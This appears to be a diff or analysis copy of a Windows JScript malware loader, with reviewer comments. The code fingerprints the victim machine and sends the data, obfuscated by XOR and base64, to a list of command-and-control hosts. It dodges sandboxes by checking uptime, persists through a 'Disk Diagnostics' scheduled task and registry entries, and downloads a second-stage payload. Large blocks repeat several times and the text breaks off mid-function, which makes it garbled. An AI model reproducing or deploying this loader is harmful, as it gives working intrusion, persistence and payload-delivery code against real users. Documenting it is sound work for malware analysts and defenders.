- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- // Developer leftover: WScript.Shell popup; not called anywhere in this script.
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- // Base64 -> bytes (MSXML bin.Base64), re-read from an ADODB.Stream as UTF-8 text.
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- // Text -> raw ASCII bytes via ADODB.Stream (written as text, re-read as binary).
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- // Base64 -> open binary ADODB.Stream; the caller saves and closes it (Windows.WriteBytes).
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- // ASCII bytes -> base64 via MSXML; strips MSXML's newlines and also every "//" sequence,
- // which corrupts any encoding that happens to contain one.
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- // Entry point: check-in runs only when CLIENT_IMPORT_ENV is undefined, i.e. when executed
- // directly rather than eval'd by a host that sets the flag (presumably the embedding loader).
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- // Loader configuration: PRIMARY_C2 = ordered host list tried by Loader.DeployClient;
- // SOFT_SIG / SOFT_VERSION = campaign and build tags (also part of the victim UID);
- // C2_OB_KEY = seed of the XOR key for all traffic; C2_PREFIX = check-in path; sleeps in
- // seconds. NOTE(review): C2_FAIL_SLEEP is never read by the code in this script.
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- // Active C2; starts as the first entry and is replaced by whichever host answers.
- var SELECTED_C2 = config.PRIMARY_C2[0];
- // Unconditional Math.imul (32-bit integer multiply) replacement for script hosts that
- // lack it; required by DataTools.Hash.
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- // Host artifacts: registry values under REG_ROOT (HKCU); scheduled task TASK_NAME running
- // PERSIST_COMMAND (explorer.exe launching a .js from C:\Users\Public); decoy NTFILE_PATH.
- // %...% placeholders are filled by DataTools.Strings.ParseTemplate. WMIC_EXEC_ARGS,
- // WMIC_EXEC, TASK_CREATE and ADS_SSID are not referenced by the code in this script.
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- // COM object factory: ProgIDs looked up by symbolic key and instantiated via ActiveXObject.
- // Only MAIN_SH_OBJECT, FS_DRIVE_OBJECT and HTTP_CLIENT_OBJECT go through it; the
- // ADODB/MSXML objects are created directly in the Base64* helpers.
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- // Obfuscation and encoding helpers; none of this is cryptography.
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- // DeriveKey: XOR-fold of keyStr into KEY_BASE, then digit sum of the result. For ASCII
- // input the key is at most 28 -- a single-byte XOR key, trivially brute-forceable.
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- // RotString: per-character XOR with key (not a rotation); self-inverse.
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- // Hash: 32-bit multiplicative hash (seed 0xdeadbeef, multiplier 2654435761) as lowercase hex.
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- // Random.Number / Random.String: Math.random-based integer in [min, max] and lowercase
- // string of length len; used for URL noise and nonces only.
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- // Strings.ParseTemplate: "k=v&k=v" -> replaces the first %k% in str with v for each pair.
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
